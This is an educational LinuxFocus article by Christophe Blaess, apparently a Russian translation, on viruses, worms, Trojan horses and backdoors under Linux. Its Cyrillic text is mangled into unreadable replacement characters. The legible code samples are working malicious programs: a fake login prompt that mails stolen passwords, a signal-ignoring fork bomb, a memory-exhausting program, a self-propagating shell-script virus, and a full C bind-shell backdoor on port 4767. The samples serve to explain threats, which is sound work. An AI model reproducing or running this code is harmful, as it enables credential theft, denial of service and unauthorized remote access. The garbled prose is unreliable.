[LinuxFocus-icon]
�����  |  �����  |  ������  |  �����

������� | ������ | ������ | ��� LF
��� ������� �������� ��: English  Castellano  ChineseGB  Deutsch  Francais  Italiano  Nederlands  Russian  Turkce  

Christophe Blaess
����� Christophe Blaess (homepage)

�� ������:

������� ����� (Christophe Blaess) -- ����������� ������� �� �����������. �� -- ����� Linux � ������� ����� ����� ������ ��������� � ���� �������. �� ������������ ������� ������� ����������� (man pages), ����������� Linux Documentation Project.



������� �� �������:
Eugene S. Saenko <caspar(at)pisem.net>

����������:

 

������: ������� ������������ ��� ���� ���

virus

������:

��� ������ ���� ������������ � ����������� ������� Linux Magazine France, ����������� ������������. ��������, ������, ����������� ������� ��������� LinuxFocus ������������ ��� ������ �� ����� ������������ �������. LinuxFocus, ��������������, ���������� �� ���, ��� ������ ��� ����� ���������� �� ����������. ���������� ����, ��� ����� ���� �������. ���� abstract ����� ������� � ������ ������ �� ����� �������.


_________________ _________________ _________________

 

���������

� ���� ������ ��������������� �������� ���������� ������������, ������� ����� ���������� � �������� Linux ��-�� ����������� ��������, ��� ������������� ��������: ������, �����, ������� � �.�. �� ��������� � ������� ��������� ����� ����������, ������������ �� � ������ ���������� ������������ ����������� � ���� ����� ������.

 

��������

����������, � ��������, ������ ���� ����������, ������� ����� ���������� ������������, ���� ����� ������ ���, ��� � ����� ������������ ��������� ���������:

�� �� ������ ��� ����� ����������������; ��������, ���� ���������, ���������������� ���������� ������������� ��� ������, � ������� -- ��� �����, ������ ������������� ������� ������� ����� ������. ��� �� ����� ����� � ����� ������ ��������� ������, � ������� ��������������� �����������, ������� ��� ����� ������� ������� Linux.

������� ����������������� ������ ��� ������ ��������� ��� ���������� ��� Linux. ������� ������ ������� ����� ������� ����� ������������� ����� ���������������, ���, ��������, ��� DOS, �� ������������ ������� �� ����� ������������. ����������, ����� ����� ����� � ����� ���������� ������ ���������.

 

������������� ������

 

������

����� -- ������� ����, ������������� ������ ���������-��������, ���������� ���������� ���� � �������� ������ ����������� ����. ������ ��������� � �����������, ����� ��������� ������������ ������ � ���� ��� ��������� "core war". ��� ���� ����� ������ � Bell AT&T laboratories [MARSDEN 00]. ����� ���� ���� ������������ ���������� ��������� ��������, ��������� ��������� ���� ����� ������ ������������ ������� ������. ������������ ������� �� ������������ �������� ������ �������� ������ ��������, ��������, ����� �������, ������������� ���������� ���������� ����� �����������. � ���� ����� ��������� �� ��� "��������������" ����������� ��������� ������� '������', � �� �����, ��� ������ ��������� ������������ �� ��������� ������������, � ����� ������������ ��� ���������, � ������ ��������� �� ��� ���������������, ����� �������� �������� "����������".

��������, ������������� ��� ���� ����, ��� ��������� �� ���������� ��������� ��� ���� ���� ���� ���������� "red code", ������� ��� ����������� ���������� �� ����������� ������������ � ��� ������ �����������. ������� � ���� ���� ��� ������ ������� ������� ������������, ���, ��������, ������� � ������������ ���� ������ "�����", ��������� ��� ������������ ���������� � �. �.

��� �� ����, �������� ������� �� core war, �������������� � Scientific American [DEWDNEY 84], ��������� ���������� � ��������� ������������ ������ ������ ������������������ ���� ���������� ��� ����������� �������� ������ ������ ��� ��� ����������� ������, ������� ��� ����������� Apple ][, ����� ��� MacIntosh � PC.

��� ������ ��������������� ������ ������� ������������ ������� MS DOS: ����������� ����������� ����� ������ ���������� �������, ������� ������ ������, ������� ������������ ������� � ������, ������� ������������� TSR, ����������� ��������, ��������������� � ������ � �.�. ����� ������� �� �������� � ��������� ���� �������������, �������� ���������� ������������ ������� �� ������-������ � ���� �� �������������� �������������� ������.

����� ����� ��������� ����� ��� ��������� ������� ����, ������� ������������� ����������� ��� ������� ����������. �� ����� ������ ���������� �� ���� ������ ����������� �����, ������� ��� �� ������������, ��������� ���� � ��� ����� ( �������� �� �������� �������� ��������� ��� ������� ����������) � ��������� ���� ����������. ��� ������� ����� ����������� ������, ������� ����������� �������.

������ ����� ������������ ��������� ���� "������" ��� ������������ �����������. � [LUDWIG 91] � [LUDWIG 93] ���� ��������� �������� ������� ��� DOS, ������������ ���������� �������� ��� ����, ����� �������� �� ������������� ������������ �����������: ��������� ����������, ���������� ��������� ���� � �.�. ����������� ���� ������, ������������ ������ ������������ ���������� ��� ����������� ����� ���������� ��������� � �����������. ���������� �� ���� ���� ����� ����� � ����� ��������� ������: [SPAFFORD 94].

�� ������� ����� � ����, ��� ����� ������������� �� ������������� �����, ������������ ������ ����� ��������� ������������� ����. ���� ������������ ���������� ���� ������ ������ ��������� ����� ������������ (����� ��� ������), ������ ����� �������������� � �������� ���������������� ������������� ������ ��� ������ ���������, ������� ����� ����������: ���������� ����, �������, �����, ����� ���������� � ��������� �����.

 

��������� ���� � ���������� �����

Timeo Danaos et dona ferentes - � ����� ��������, ���� ���� ����������. (Virgile, the Aeneid, II, 49).

���������� ������� �� ���� ���� ������� � ���� ����� �������� ���������� ������ ����, ����������� ����������� ������� � �������� ����������������. ������ ���� ��������� ����� ����������, �������, ���������� � ������, ��� �������� ���� ��������� ����� �������, ��������� ������ ������ � ��������� �����.

��������� ������ "��������� ����" ����� ������������ � ������� ������������ ������������ ��� ����������� a priori ����������� ����������, �������, ��� � ������������� ���� ������, ����� � ���� ������������� ���, ���������� ���������� ������.

���������� ����� -- ���������� ����������� ������ ���������, ������� ����� ������� ��������� �������:

� ��������� ������� ���������� ����� ����� ���� �������� ��� ������������� ������� �������, �� ������� ��� ����� �������� �������� ���������������� ����������, ��������� ������������ �����, ��� ���������������� ������������, ����������� ��� ���������������. �� �� ����� ����� �� ������ ������� ����� ��������� ����������.

���������� ����� ����� ����� ���������� ��������� ��������� �������, � ������� ��� ���������. ������������ ��� ����� �������, �� ��� ���� (�������� CMOS, ������ ����������� ����-������ ������, ���������� ������������� �������� �������� ����� ������� �������������� ��������, ���������� �������� ������� �������� �����...)

��������� "��������" �������� ������, ��� ��� ����������� ���������� ����� ����� ���������. ����������, �������� �������������� �������� ��� ������ ������� -- ������ � ����� ������ ������������� ������� ��� ���������� ���� ��� ������. ����� ����� ��������� ���������� ����� ������� �� ������ ��������� �����. ��� ����������� "�����" ������ ������� �� ������ �������, � ���� ���� ���� � ��������� ����, ���������� ��� ������������ ��������� ����� ����� ���������� ������ ���������� � �������� ���������� ������.

��������� ��������� ��� ����� ����������� �������� ����� ���� ����� �������������: ������ ���� ����� ���������, �������� ������������ ������� ������ (����������), ������������ ���������� � ���� � ������� 30 �����, ������������ �������� ������� ������... ������������ �������! �������� ��������� ��������� ���� -- ������������, ���� ������� � ��� ������� �� ����. ����� ��������������� ��������� ��� ��������� ����� �������� ��������� ����������� ��������, ��������, ���� ���������� ����� ���������� � �������� ����� ���, ��� ����������� �����������, ��� ������������ ��� ����� �����������.

������ ��������� ������ ���������� ���� -- ��������� ������, �������� �� ����� ������ ������/������, ���������� ���������� ���������� ��������, ��� ������������ � ������������ ���� ������. ���� ��� ��������� �� ��������� ���������, �� �������� ����������� ������ ������������, ������� ���������� ��������������.

#! /bin/sh

clear
cat /etc/issue
echo -n "login: "
read login
echo -n "Password: "
stty -echo
read passwd
stty sane
mail $USER <<- fin
        login: $login
        passwd: $passwd
fin
echo "Login incorrect"
sleep 1
logout

����� �� ���������� ����� ����������, ��� ���� ��������� �������� �������� exec. ������, ������ ��������� "Login incorrect", �����, ��� �� �������� ������ ��� �����, � ������������ �����, ������ ������� �������. ����� ����������� ������ ����� ������������ ������� ������ X11. ����� �������� ���� �������, ����� ����� �� �������, ������ �� ��������, � ������ ��� ������ ��������� ���� �����/������, ����� �� ������ ��� ��-���������� ����� � ������� (����� ������� �������������� ����� �����).

 

����� (Worms)

� ��� �������� �� �����, �����, ��� ���������, �������������� ��� ���������. (�. ������� "����")

"�����" ����� �� �� �������, ��� � ������. ��� -- ���������, ������� ����������� ��������� ����������� ����������. ���� ���� ��� �� ������� �� ��������, ��� ����� ��������� ���������� ����� � ���������� �������������. ������� ����� ������� � �������� ������� � ���, ��� ����� ���������� ��� ������ �������� � ���������� �� ��������� �� ���������-��������, � ���������� ��� ���� ���� �������������, ���������������� ������, ������, ��� ����������� �����.

����������� ������� ������ �������� �����; ��� ���������� ��� ������������ ���� �� ��������� ������ ���������� ������������ ����������� ������� �����. �� ������������ ��� "Internet Worm (��������-�����)" 1968 ����.

Internet Worm -- ��� ������ ������� �����, �� ����������� ���������� �����, ��� �� �����, ��� ���������� �������������� ������ ��� ������. �� ������ ����� ������� �� ������� �������� � [KEHOE 92], � ��������� ������ � [SPAFFORD 88] ��� [EICHIN 89]. ������� ��� ����� �����������, �� ����� ������������� �������� � [STOLL 89] (�������������� ����� � ���� ������� (Cuckoo Egg saga)). ����� � ��������� ������ � ���� ������, � �������� ��������������� ���������� ���� ������ ������.

������ ������, ���� ����� -- ��� ���������, ���������� �������� �������� ��. (Robert Morris Jr), ��������� ������������ ������������, ��� ��������� �� ������ �� ��������� ������������ ������������ � ������� ���������� [MORRIS 85]. ��� ����, ��� �� ��� ����� ��������, �������������� �� ������������ ������������ � NCSC (������������ ����� �� ������ ������������ ������), ��������� NSA (��������� ������������ ������������), ����������� ���������. ����� ��� ������� � ����� ��� 2-�� ������ 1988 ���� � ������������ ����������� ������, ������������ � ��������. ��� ������ �������� �� ���������� ������:

  1. ����� �� ���������, ����� ������� ��������� ���� �� ����. ��� ��������� ������� �� ����� ��������� ����� � ������� �������, ����� ��� netstat, ��������������� ���������� � ������� �����������.
  2. ����� �� ������� �������� ������ � ������� ������� �������������. � ���� ����� �� ��������� ���������� ������� � ������ �������. ��, �����, �������� ������������ � �������� ������ ���������� ����� ������������ (� �������� ������, ����������� ��������� ��� � �.�.). ���� ��� �������� �� ������ ����������, ��������� � ���, ��� ������������� ������ �������� � �����, �������� ��� ������, (/etc/passwd), � �������������� ��������� ������� ������� ���������� ��������������. �� ���� ������ ���������� ���������� � ������� shadow passwords (������� �������).
  3. ���� ������� �������� ������ � ������� ������� �������������, ����� ������� ����� ������, ��������������� ������ ������ ��� �������������, �� ���� � ������� ������ ~/.rhost � /etc/hosts.equiv. � ���� ������ ��� ���������� ������ �� ��������� ���������� ������������ rsh. ����� ������� ��� ��������� ����������� ���� �� ����� ��������� � ������� ��������� �������.
  4. � ��������� ������ ��� ������������� �� ������ ������ �������������� ������ ����������, ������������� ������������ ������ fingerd.
    (������������� � ����� ������, ����������� ����������� ����������������: Avoiding security holes when developing an application - Part 1 (��� �������� ��� � ������������ ��� ���������� ���������� - ����� 1), Avoiding security holes when developing an application - Part 2: memory, stack and functions, shellcode (��� �������� ��� � ������������ ��� ���������� ���������� - ����� 2: ������, ���� � �������, �������), Avoiding security holes when developing an application - Part 3: buffer overflows (��� �������� ��� � ������������ ��� ���������� ���������� - ����� 3: ������������ ������ ).)
    ��� ������ ������ ����������� ���������� ���������� ����. ����� ����� ������� ����������� ����������� ���� �� ����� ������� � ������ ��� �������. ���������� ��� ����������� ������ �� ��������� ����� �����������.
  5. �, �������, �������������� ������ ����������: ����� �������, ���������� �� ��������� � ������ sendmail, ����������� ���������� ����� ��������������� �� ����������� ���� ���������. ��� ����� ������� �� ������ ���������� �� ������� ����������������� ����������, ��, � ���������, ����������� ��������������� ���������� ��� �������.

���� ��������, ��� ���� ����� ������� ����������� ��������� ��������� ������� �� ��������� ������, ������� ��������������� ��� �������� ������. ����������� �������� ��������� ��������� �� C, �������������� �� �� ����� � ���������. ��� ������������� TCP/IP ���������� � �������� ����������� � �������� ��� �������� ����� �����. ������� �������������� ��������������� �������� ����� ��� ��������� ���������� (Vax � Sun), ��� ������������ ���� �� ������. ����� ����, ����� ��� ����� ���� � ��������, ������� �� ����� �����.

� ���������, ��������, ��������������� ������������ ��������� ����������, �� �������, ��� ��������������, � �������������� ������ ����� Internet 88, �� ������������ ���������� �����, �������� ���� ������� ����������� ���������� ������ (�������� ����������� ����������� �����, ��� �������� �������� � ������������).

���������� ������������ ������� �������������� ������. ��� ����������� �� ����������. �� �� ������� ��������� � ������ ����� ���������, ��������, ����������������� � ������� �������� � ����������� ������, ������, ��� ���������� "ILoveYou". ��� ������ �������� ������, ��������� ��� -- �������, ���������� (�� �������) ��� ��������������� ������� ��� ������ �����. ��� �������� ������ �� ��������� ������������ ��������, ���� �������� ��������� ���������������� ���������� �������. ��� ��������� ������ ������ �� ��������� �����, ��� �� ������, ��������� ��� �� ������� ��������� ���������� ������������.

 

������ ���� (����)

������ ���� (Backdoors) ����� ������� � ���������� ������, �� ��� �� ���� � �� ��. ������ ��� ��������� ("������������") ������������ �������� �� ����������� �����������, �������� ��� ���������. ��� ����� �������� � ���������� ������ (cheat codes), ������� ������������ � ��������� �����, ����� �������� ������ ��������, ������� �� ������� ������� � �.�. �� ��� �� ��������� � ��������� ����������, ��������������� ��� �������������� ���������� ��� ����������� �����, ��������� � ��� ����� ���� ��������� ���� �� ������, ���������� ������ ��������� ���������.

������������ �����, � ����� ��������� ���� �������, ��������� �������� ��������� ������, ����� ����� ����������� �������� � ���������� �� ������� ����� �������� ���������������, � ��� ����� � ����� ��������� ����������� � �������. ������ ������� ���� ����� ������ �� ��������� (system, admin, superuser, � �.�.) ������� �� ���������������, ��� ��������� ��������������� ��������� �� �����������.

��������� ��������� ������� �����, ����������� �������� � ����� ������� � ������ "Wargame", �� ����� ����� � ����� ������ ���������� � �������� ������������. � ���������� ������ [THOMPSON 84] ��� ������� (Ken Thompson), ���� �� ���������� UNIX, ��������� ������� ������, ������� �� �������� �� �������� Unix ����� ��� �����:

��� � ���� ���������? �� ������! ������������ ���� -- ������ ���������� ��������� ����� �������. ���� �� �� ������� ������ "� ����", ������� � ���������, ������������ �������, ������������ � ������, �� �� ������ ���� ���������, ��� ������ �� ���������� �����, ���� ���� �������� �������� ���.

 

� ��� � Linux?

�� ����������� ������� ����� � ����� �������. � ������ ������� ��������� �� ����, ����������� � ��������� ����������� ����������� � Linux.

 

���������� �����

��-������, ������� ���������� �����������, ������� ���������� ����� �������� ��������� ������� Linux. �������, ��� ������� �� ��������� ������� � ���� ������������, �� ����� �������� ��� �����������.

���� ���� �������� ���������� ������ ��� ������� � ���������������� ����������, �� �� ����� ��� ������. ���� ����� ����������� �� ����� root, � �� ������������ ��� ���� ������, ������� ����������� �������� ������ ������� ����� � ������ � ����������� �����������. ���� ��� ����������� �� ����� ������� ������������, ��� �� ����� ���� ����� �������������, ��� ������������ � ���������������� �������. ��� ����� ��������� ������ ������, ������������� ����� ������������. � ���� ������ ������ � ������ �� ���� �����. ������������� ��������� ������������� ��������� �� ����� root ���� �������� ������, ��� ��������� ����������� ��������� �� ����� ����� ���������� �����.

������� Linux ������� �������� � ����� ������ ������� � ������� ������ � � ����������� �����������, �� ������������� � ������, �������� �� ����������������� ��-�� ���������� �������� ���������� ��������. ��������, ��������� ��������� ������ ����������, ���� ���� ��� �������� �� ����� �������� ������������, ���������, ���� ���������� ��������� �� ������������ �� ����������, ��� ����� "�������" ��� ��������� ����� � ������� ��������� � ������������� ����� ������� ����� ��:

  #include <signal.h>
  #include <unistd.h>

  int
main (void)
{
  int i;
  for (i = 0; i < NSIG; i ++)
    signal (i, SIG_IGN);
  while (1)
    fork ();
}

�������, ������� �� ������ ���������� ��� �������������, (� ������� ���������� ������ setrlimit() � ������� �������� ulimit), ��������� ��������� ����� ����� ����� ���������, �� ��� ����� ������������� ������ ����� ��������� ����� ����� ����, ��� ������� ����� �����������.

�� ���� �� ������� ���������, �������� ���������, �������� ��� ��������� ������ � �������������, "������" ����� ������������ ����������, �������� ������ ��������� ���������:

  #include <stdlib.h>

  #define LG      1024

  int
main (void) {
  char * buffer;
  while ((buffer = malloc (LG)) != NULL)
     memset (buffer, 0, LG);
  while (1)
    ;
}

������, � �������� ������� ����, ��� ��������� ������������� ������� �������� ���������� ����������� �������. �� �� ����� ���� ����� ����� ������ ��������, ������� ������� ����� ������ � �������� ��������� (��������, ���������� X11). ����� ����, ��� ������ ��������, ��������� ������, �� ������� ��, ��� ����� �������� � �� ����������.

������� �� ����� ������� ������ ����� �������� ������, ���������� ��������������� ���� ������������ ��������� ����������. �������, ����������� �������� �����, ����������, �� ��� �� ������ ����������� ���������������. ���� ��������, ���� ���� ���������� �����, ���������� �� ����� �������� ������������ �� ����� ��������� ����� ��� �� �������������, ��� ����� �������� ����� �������������. ���������� �������������� ��������� fork(), malloc() � connect(), ����� ������� �������� ������� � ������� ������.

 

������

����: ������ Unix

�� �������� ����� UNIX

���� ����� ��������� � ������������ � ������������� ���������:

���� � ��� Linux ��� Unix, ����������, ��������� ��� �������� ����� ������� �
���������� ��������� ������ �� ����� �������.

������� ��������� ������, ������ ����� ����������� ��� Linux. ���� ������ ������. � ���������������� ������ ��, ��� ������ �� ������� ��� Linux ������������� ����� ��� ���������������. ��� ������, ������� ���������� ���� ��������� ������. �� ��� ������ ���� �������� ��� ������. ��� ������, ��� ���������� ���������� ���� ��� ���������� � ������ �������. � ���� Linux �������, ����� �������� ����-���� ���������, �������� ��� URL, ��� ��������� ���������, ������ �������� ��� ����������� ������. ��� ������, ��� ����� ������ � ������������ �����, ��� �� ����� ���� ����� ���������. ���� ������ ������������, ��, ����� ����� ��� ����������������, ��� ������ �������������� � �������� ��������� ��������������� ���������������� ��������, ��� ����������� �������. ����������, ����������� ���� -- �� ����� ������� ������������ �������� ��� ���������� ����� � ���� ���������� ������������ �����������.

��� �������� ��������������� � �������� ������, �������, ���������� ��������� ����� �������� ������ �� �����, �� ������� ������������, ����������� ��� ���������, ����� ����� ������. ������������� ������������� �� ����� root ��������� ������ ��������, ������������� ��������� ����� ����, � ���� �� ����� ���������� ����� ��������� ��� ���� ������. ���� �� ������������� Set-UID root ����������, ����������� �������, ���� ����������� ���������. ���� ������� ������������ ��������� ���������� ���������, ����� �������� ������ �� �����, ������������� ����� ������������, ��� �� �������� ��� ���������������� �� ��������� �������.

��, ��� ������ ������������ ������ ��� Unix � ������� ����������� �������, ����������� ������������� ����������� (�� ���� ������ ����������) � ��������� (�� ���� ������ �� �������), ������� ������������ ���������� ������������������� ����. ������� ��� �� ������ ��� � �����, ���������� ELF-�����, ��������������� ��� Linux �� ���������� i386 � ����������� GlibC 2.1, ������ ������ �����. ����� ����, ����� ����� ���� ������� �� �����, �� ��������� �� �������, �� ������� �� �����������. ��������, ����� ��� ������� ��������. �� �������� ������� � ����� ������ � ��������, �� �������� ��� �������. ����� �������� ���������� ��������� ������ � ���� �� �������, ����� ���������� �������, � ������� �� ������ ������ ����� ����������� "infected" ��� "vaccinated" ("�����������" ��� "������������").

#! /bin/sh
# infected

( tmp_fic=/tmp/$$
candidates=$(find . -type f -uid $UID -perm -0755)
for fic in $candidates ; do
        exec < $fic
        # ���������� �������� ������ ������,
        if  ! read line ; then
                continue
        fi
        # � �������������, ��� ��� -- ������ ��������.
        if [ "$line" != "#!/bin/sh" ] && [ "$line" != "#! /bin/sh" ] ; then
                continue
        fi
        # ������� ������ ������.
        if ! read line ; then
                continue
        fi
        # ���� ��� ����������� ��� ������������?
        if [ "$line" == "# vaccinated" ] || [ "$line" == "# infected" ] ; then
                continue
        fi
        # ���� ��� -- ������� ���: ��������� ���� ������,
        head -33 $0 > $tmp_fic
        # � �������� ����.
        cat $fic >> $tmp_fic
        # ������� �������� ����.
        cat $tmp_fic > $fic
done
 rm -f $tmp_fic
) 2>/dev/null &

���� ����� �� ��������� � ���, ����� �������� ���� ��� ���������� ����� ������������, �� ����������� ����, ��� ��������� � ������� ������, �������� �������� ������ ������ ��� ������� ������. �������, �� ���������� ���� ������ ��� root! ��������, ���� �� �������� find . �� find /. �������� �� �������� ���� ���������, ����� ����� �������� ����������� ���, ��������, ���� � ������� ������� ��������� ��������, ��������������� � ����������� ��������.

������� 1 �������� ���������� � ������ ��������� ������� ��� Linux. ��� ��� �������� ����������� ELF-�����, ������� ���� ��� ����� ����� ��������� ����� � ������� � ����� ����� ������� ��������� ����. ���� �� ������� ����, ��� ���� ������������� ���� � ��������� ���������. ������ �� ���� ������� �� ������ ���������, ��� ������ ��� Linux -- ��� �� �������, ���� ��� � �� ����� ������, ������� ������� ������, ��� �� ��� ��� ��� ������ ���������.

������� 1 - ������ ��� Linux
��� ���������� ����� ����������
Bliss ������ ��������� �������������� ����������� ������������ ����� ��� ������ � ������ --bliss-disinfect-files-please
Diesel ���  
Kagob ��� ���������� ��������� ���� ��� ���������� ���������� �������� ���������
Satyr ���  
Vit4096 ��� �������� ����� ������ � ������� ��������.
Winter ��� ���� ������ ������� �� 341 �����. �������� ����� ������ � ������� ��������.
Winux ��� ���� ����� �������� ��� ��������� ���� � ����� �������� ��� ����� Windows, ��� � Elf-�����. �� �� �� ����� ������� �� �������, �������� �� ����, �� ������� ��������� �� ���, ��� ���������� ��� ���������������.
ZipWorm ��������� "�������" ������ � Linux � Windows � Zip-�����, ������� ��� ������� �����.  

�� ������ ��������, ��� ����� "Winux" �������� ���������������� ��� ��� Windows, ��� � ��� Linux. ��� ���������� �����, ������ �������� ������������, ��� �������� ������. ��� �� �����, ������� ������ �� �����, ���� �������� � ���, ��� ����� ����������� ����� ����� ������������� � ������ ������� �� ������, ���������� � ������������ ����, ��������� ������� Samba � �.�. ���������� �� ���� ����������� � ����, ��������� ����������� ����������� ������ ���� �������� ������������ � ����� ��������. ����� ��������, ��� �������� ������ Linux, �� ����������� ������, ����������� ��� ��������������� ����������� ������������, �������� ��������� �����, �� �������� ��� ������� � ������� ������, ����������� ��� ����������� Windows.

������� ������ ����� ������: ����� ���������������� ����������������, ������� �� ������ ����������� ��� Linux, ���������� ��������������, ���� �� ���������� ������ � ������� Windows, �� ������� �������� "���������" ������������������� �����. ��� �������� ��������� ��� ������ ������, ������������ ������� �������� � ����� ������������� ���������; ����� ������������ ������ ������� �� ������� ������������ ��������� �� ������! ������������ ������� ������� � ���, ����� ������������� ������ � �������� Linux ������ ���������� Windows, ��������� ����������� �������� �������. �� ����� �������� �������, ����, �� ����� �������������� � ���� ���������, ��� ������ ������, ��������� ���������������� �������, ����� ������������ �������� ��������� ��� ����� Linux.

 

��������� ����

��������� ���� ��� �� ������, ��� � ������, ��, �������, �� ��������� ����� ���������. � ������� �� ���������� �����, ������� ����� �����, ����� ������ ���������� ���� �������� ������������ �������. � ���� ���������� ������������ ����������� ���������� �� ������ ���������� ������� ���� �� ��������� ������������ ���������� �����-����� ������������ (������, ���� -- �������� ����������, � ������ -- ���, ��� ������� �����������). ���� ��������� ��������� ����, "�����������" ����� �����.

����� �������, ��� ���������� ������������ ����������� �������� ������ ������� ������ ��������� �����. �� �� ������� � ��������� ����������� �����������, ��� �� ��� ����� �������, � ������������ ���������, �������������� �������������� � ������������ �������. ��� �������� ������ �� shareware ��� freeware, ���������� ������ ����������������, ����������� ����������������� ������� web-������ (��� CD, ����������� � ��������), ��� ����� �������� ������ �� ������ e-mail, ������� ����� ����������������; ��� ��� ���� ������� ����� ��������� ��������.

������� ������� ��� ����, ��� ����� �������� ����� � �������������� ��������������� ��� -- ��� ��� �� �������� ������������. ������� ���������� �����, ��������, ����� ���� �������� � ������� "configure", (�� ���������� �� ����� "./configure; make"), ������� ������ ����� ����� 2000 �����! � ��������� �� �������, �� �� �� ��������, �������� ��� ���������� ���� � �������������; �� ��� �� �������� ��������� ���������� ����� � Makefile � �������������� �� ��������� �������� "make install", ����������� ������ �� ����� root!

�, �������, ������ ����� ������� � ��������� �����, ������� ��� Windows, ��� �������, ����������� ��� ������ � ����������. ����������� ������ ��� Linux �� �������� ���������������� ��� �������, �� ������� ���� ������, � ������������ ����� �������� �������������� �������� ������������. �������� �����, ����� ��� ��������� ������ ��������� ������� �������, ���������� � ��������. ���� ��� ������ ������������� ������ � ������ (������) ���� ��������� ���� �������� ��������� ��������� �������. �������, ��� � � ������ � ��������, �������������� ������ ��������� ������������ ������������. �� ����, ��� �� �������� ��������� ����� (�������, ��������� � ���������������� CD), ��� ����� ������ �������� ��� ������������, ������ ��� ����������� ��� ���� ���������, �������� ������, �����, ���� ��������� ��������� ����� ���� ������� ����� �����.

� ����� �������, ������������ ��������� �����, ������� �������, ��� ������ ������� � ���� �������� ������������, ���� ���� ���������� �� ������������, ���������� ��������� �����-�� ����. � Usenet �����, ����� �� �������, ����� ������ �����, �������������� � ������ ������ �� ��� ���, ���� �� ����� ��������� ��� �������� ������������. ��������� ����� Postscript �����, �����, ����������� ������������� (ghostscript ��� gv), ���������� ����� ����������. ��� �� �������������, �� ��������� � �������� � ������� �������.

 

�����

� 1968 ����, �� ������� Internet Worm ��� �� ���� Linux; �� �� ���� ����� �����. ����������� ��������� ���� ��������� �������� ������ ����� ����������� ����� ������� (��������, ������������ ������). ��������� ��������� ����� "�������� ��������" ��������� ���������� ������� ��� Linux. � ������� 2 ��������� ��������� �� ���, �������� ����������������.

����� ���������� ���������� ������� ��������. ��� ������� �������, �������������� � �������� ����� �� ������� ���� ������������ ����, ��� ��� ��������� ������������ ��������. ��� �� �����, �������� ������� �����������, ������������ �������� ������������� (������, SDL � �.�.), � �������� ���������� ����������� ������� ����� (HTTP �������, ��������� FTP � �.�.) �������� � ����, ��� ��� �������� �������������� ���.

������� 2 - ����� ��� Linux
��� ���������� ����������
Lion (1i0n) bind ��������� �� ���������� ������ ������ ��� (TCP port 10008) � ������������� root-kit. ���������� ���������� � ������ �� ������ e-mail � �����.
Ramen lpr, nfs, wu-ftpd ������ ����� index.html, ������� �������.
Adore (Red Worm) bind, lpr, rpc, wu-ftpd ��������� � ������� ������ ��� � �������� ���������� � ������� �� ������� e-mail � ����� � ���. ����� �������� ���� ��������, ������������� ���������������� ������ ps.
Cheese ��� Lion ����� ��������� ���� � ������ �������, ����������� � �������� ������ ����, �������� ������ Lion.

��� �������� ������, ������� ��������, ��� �� ��������������� ���������� �� �������. ��� ����� "��������" ������ ������� ���� � ����� ������� �� ������ �, �������, ��� ������� �� ������� �������� �����������. ����������� ���������� �������� ������������� �� ���������������. � �������, ������, �������� ������� ����� ������ ������������� (������ ����) ��������� �� ������ ������������� -- ��� ������ ����������� ������� -- ������� �������� ������������ ��� ��������� ��������. ��� ������ �����������, ����� �� ���������� ������������ ��������� ��� ����� ������ ���������� ��������������, ������ ����, ����� ������������ �������� ������������.

 

������ ����

�������� ������� ���� �����, ���� ��� ���������� ������������ �����������. �������, ���� �������� ����� ��������� ��������, ��, ������������, ������ ���������, ��� ��� ������. ����������, ����� �������� ���� ������ ���������� �������, ����������� �� ���������. ��������, ��������� ���������, ����������� ����, ������� ����������� ������ ���, �, ��������� ���������� �������, �� ����� �������� ������ ���������� �������� ����������. ��� ��������� �������� �� ������ ������� �� ���� ����� [BLAESS 00], ��������������� �������� ���������������. ��� ��������� �� ����� ����������, ��������� �� ��� ������� �����������, ����� ������� �� ������. � ���� �� ����� �� ��� ������� ��� �������� ������. ��� ���������� ��� ��������� ��������� TCP/IP ������ � ������, ���������� � ������ ��������� (�� ��������� 4767) �� ������ ������� ���������� ������. ������ ������ ���������� �� ����� ����� ������������� �������� ������ � �������� ��� ������ ��������������!!!

    #define _GNU_SOURCE 500
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <termios.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define ADRESSE_BACKDOOR  INADDR_ANY
    #define PORT_BACKDOOR     4767

    int
main (void)
{
    int                sock;
    int                sockopt;
    struct sockaddr_in adresse; /* address */
    socklen_t          longueur; /* length */
    int                sock2;
    int        pty_maitre; /* pty_master */
    int        pty_esclave; /* pty_slave */
    char *         nom_pty; /* name_pty */
    struct termios     termios;
    char * args [2] = { "/bin/sh", NULL };
    fd_set         set;
    char           buffer [4096];
    int            n;

    sock = socket (AF_INET, SOCK_STREAM, 0);
    sockopt = 1;
    setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, & sockopt, sizeof(sockopt));
    memset (& adresse, 0, sizeof (struct sockaddr));
    adresse . sin_family = AF_INET;
    adresse . sin_addr . s_addr = htonl (ADRESSE_BACKDOOR);
    adresse . sin_port = htons (PORT_BACKDOOR);
    if (bind (sock, (struct sockaddr *) & adresse, sizeof (adresse)))
        exit (1);
    listen (sock, 5);
    while (1) {
        longueur = sizeof (struct sockaddr_in);
        if ((sock2 = accept (sock, & adresse, & longueur)) < 0)
            continue;
        if (fork () == 0) break;
        close (sock2);
    }
    close (sock);
    if ((pty_maitre = getpt()) < 0) exit (1);
    grantpt  (pty_maitre);
    unlockpt (pty_maitre);
    nom_pty = ptsname (pty_maitre);
    tcgetattr (STDIN_FILENO, & termios);
    if (fork () == 0) {
        /* Son: shell execution in the slave
            pseudo-TTY */
        close (pty_maitre);
        setsid();
        pty_esclave = open (nom_pty, O_RDWR);
        tcsetattr (pty_esclave, TCSANOW, & termios);
        dup2 (pty_esclave, STDIN_FILENO);
        dup2 (pty_esclave, STDOUT_FILENO);
        dup2 (pty_esclave, STDERR_FILENO);
        execv (args [0], args);
        exit (1);
    }
    /* Father: copy of the socket to the master pseudo-TTY
        and vice versa */
        tcgetattr (pty_maitre, & termios);
    cfmakeraw (& termios);
    tcsetattr (pty_maitre, TCSANOW, & termios);
    while (1) {
        FD_ZERO (& set);
        FD_SET (sock2, & set);
        FD_SET (pty_maitre, & set);
        if (select (pty_maitre < sock2 ? sock2+1: pty_maitre+1,
             & set, NULL, NULL, NULL) < 0)
            break;
        if (FD_ISSET (sock2, &set)) {
            if ((n = read (sock2, buffer, 4096)) < 0)
                break;
            write (pty_maitre, buffer, n);
        }
        if (FD_ISSET (pty_maitre, &set)) {
            if ((n = read (pty_maitre, buffer, 4096)) < 0)
                break;
            write (sock2, buffer, n);
        }
    }
    return (0);
}

